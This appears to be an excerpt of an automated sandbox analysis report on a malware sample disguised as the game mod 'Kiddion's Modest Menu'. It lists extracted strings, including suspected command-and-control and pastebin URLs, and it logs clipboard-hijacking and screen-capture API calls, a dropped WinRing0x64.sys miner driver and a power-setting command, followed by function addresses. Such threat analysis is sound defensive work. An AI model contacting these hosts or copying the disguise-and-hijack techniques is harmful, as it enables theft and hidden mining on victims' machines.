                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2018067690.000000000163F000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394143560.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394424410.0000000001640000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/aNzS
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017827441.0000000001652000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394463613.0000000001652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/aNzS-.n
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394143560.00000000015DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/aNzS_
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394381912.000000000162D000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2018544674.000000000162C000.00000004.00000020.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/q
                  Source: powershell.exe, 00000011.00000002.1442060312.0000000005F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002AFE000.00000004.00000800.00020000.00000000.sdmp, 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1489565252.0000000002AA5000.00000004.00000800.00020000.00000000.sdmp, logs.uce0.14.dr, logs.uce1.14.dr, logs.uce.14.drString found in binary or memory: https://pastebin.com/raw/YpJeSRBC
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235180750.0000000003E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235180750.0000000003E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235479855.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: Kiddion's Modest Menu v.1.0.0.exeString found in binary or memory: https://www.entrust.net/rpa0
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235479855.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1166088583.0000000003C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235180750.0000000003E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235180750.0000000003E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235180750.0000000003E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235180750.0000000003E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1235180750.0000000003E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49736 version: TLS 1.2
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_0043F820 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043F820
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_03A21000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_03A21000
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_0043F820 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,2_2_0043F820
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_0044004F GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_0044004F

                  System Summary

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A064600_2_00A06460
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C553B0_2_009C553B
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A04CB00_2_00A04CB0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E1F500_2_009E1F50
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A060900_2_00A06090
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A190F00_2_00A190F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1E0F00_2_00A1E0F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2B0F00_2_00A2B0F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009DA0F00_2_009DA0F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D50E00_2_009D50E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E00E00_2_009E00E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2A0300_2_00A2A030
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C10000_2_009C1000
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CE0300_2_009CE030
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A160100_2_00A16010
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009EE0200_2_009EE020
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1D0700_2_00A1D070
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FD0700_2_009FD070
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1C0500_2_00A1C050
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009DF1900_2_009DF190
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D01A00_2_009D01A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C41D00_2_009C41D0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A241D00_2_00A241D0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F01100_2_009F0110
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F81300_2_009F8130
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A141100_2_00A14110
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D91500_2_009D9150
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F71700_2_009F7170
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E52900_2_009E5290
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A212B00_2_00A212B0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D82B00_2_009D82B0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A322CA0_2_00A322CA
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C72E00_2_009C72E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A382300_2_00A38230
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E32000_2_009E3200
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A222100_2_00A22210
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CD2500_2_009CD250
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A002400_2_00A00240
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1D3B00_2_00A1D3B0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009DE3A00_2_009DE3A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F53A00_2_009F53A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A293E00_2_00A293E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009EA3F00_2_009EA3F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A093D00_2_00A093D0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A013200_2_00A01320
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C83100_2_009C8310
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009DB3100_2_009DB310
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A233300_2_00A23330
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CA3000_2_009CA300
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009ED3300_2_009ED330
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E73200_2_009E7320
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A0A3500_2_00A0A350
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A103500_2_00A10350
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1C3500_2_00A1C350
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E93600_2_009E9360
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009EE4900_2_009EE490
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A184C00_2_00A184C0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2A4C00_2_00A2A4C0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A284200_2_00A28420
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009DD4100_2_009DD410
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F64100_2_009F6410
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A134300_2_00A13430
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D04300_2_009D0430
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D44300_2_009D4430
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D24500_2_009D2450
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E54500_2_009E5450
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A455920_2_00A45592
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FC5A00_2_009FC5A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FF5D00_2_009FF5D0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E55C00_2_009E55C0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009EB5F00_2_009EB5F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A295D00_2_00A295D0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D35100_2_009D3510
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1F5300_2_00A1F530
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D65300_2_009D6530
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E35300_2_009E3530
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A195760_2_00A19576
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FB5600_2_009FB560
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CE6900_2_009CE690
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A156900_2_00A15690
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009EC6D00_2_009EC6D0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D76C00_2_009D76C0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CB6F00_2_009CB6F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E66F00_2_009E66F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FD6E00_2_009FD6E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F86E00_2_009F86E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CC6100_2_009CC610
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A176300_2_00A17630
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A216300_2_00A21630
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D06200_2_009D0620
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A016600_2_00A01660
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1A6600_2_00A1A660
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A246400_2_00A24640
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A096500_2_00A09650
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A107F00_2_00A107F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CD7F00_2_009CD7F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C97180_2_009C9718
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CA7000_2_009CA700
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A157000_2_00A15700
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A437180_2_00A43718
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D97400_2_009D9740
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A078A00_2_00A078A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E98A00_2_009E98A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E28C00_2_009E28C0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009DD8100_2_009DD810
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FA8100_2_009FA810
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A228000_2_00A22800
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C58560_2_009C5856
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D38400_2_009D3840
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FC8700_2_009FC870
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009DF8600_2_009DF860
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C89900_2_009C8990
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1D9800_2_00A1D980
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D89A00_2_009D89A0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FE9C00_2_009FE9C0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A169200_2_00A16920
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CC9060_2_009CC906
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009DE9000_2_009DE900
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F89000_2_009F8900
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A2D90A0_2_00A2D90A
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D69400_2_009D6940
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CB9600_2_009CB960
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E3A900_2_009E3A90
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A27AB00_2_00A27AB0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D7AA00_2_009D7AA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F8AA00_2_009F8AA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C9AF60_2_009C9AF6
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A23A200_2_00A23A20
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A11A000_2_00A11A00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009ECA300_2_009ECA30
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009EDA300_2_009EDA30
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F3A500_2_009F3A50
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A08A700_2_00A08A70
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1BA400_2_00A1BA40
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D0B900_2_009D0B90
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A17BB00_2_00A17BB0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009DDB800_2_009DDB80
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D1BA00_2_009D1BA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009EABF00_2_009EABF0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FABF00_2_009FABF0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009CCB0F0_2_009CCB0F
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C7B000_2_009C7B00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D7B500_2_009D7B50
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A0EB400_2_00A0EB40
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D4C100_2_009D4C10
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E2C000_2_009E2C00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A21C000_2_00A21C00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F3C700_2_009F3C70
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E2D800_2_009E2D80
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FDD800_2_009FDD80
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FDDD90_2_009FDDD9
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C8DD00_2_009C8DD0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009F7DD00_2_009F7DD0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A07DF00_2_00A07DF0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C5DF60_2_009C5DF6
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009D0DE00_2_009D0DE0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E9D000_2_009E9D00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1FD000_2_00A1FD00
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009C9D300_2_009C9D30
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FFD200_2_009FFD20
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A23D600_2_00A23D60
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A03EA00_2_00A03EA0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A02E800_2_00A02E80
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A1AE800_2_00A1AE80
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E5EB00_2_009E5EB0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_00A0AEE00_2_00A0AEE0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009FAEC00_2_009FAEC0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 0_2_009E0E100_2_009E0E10
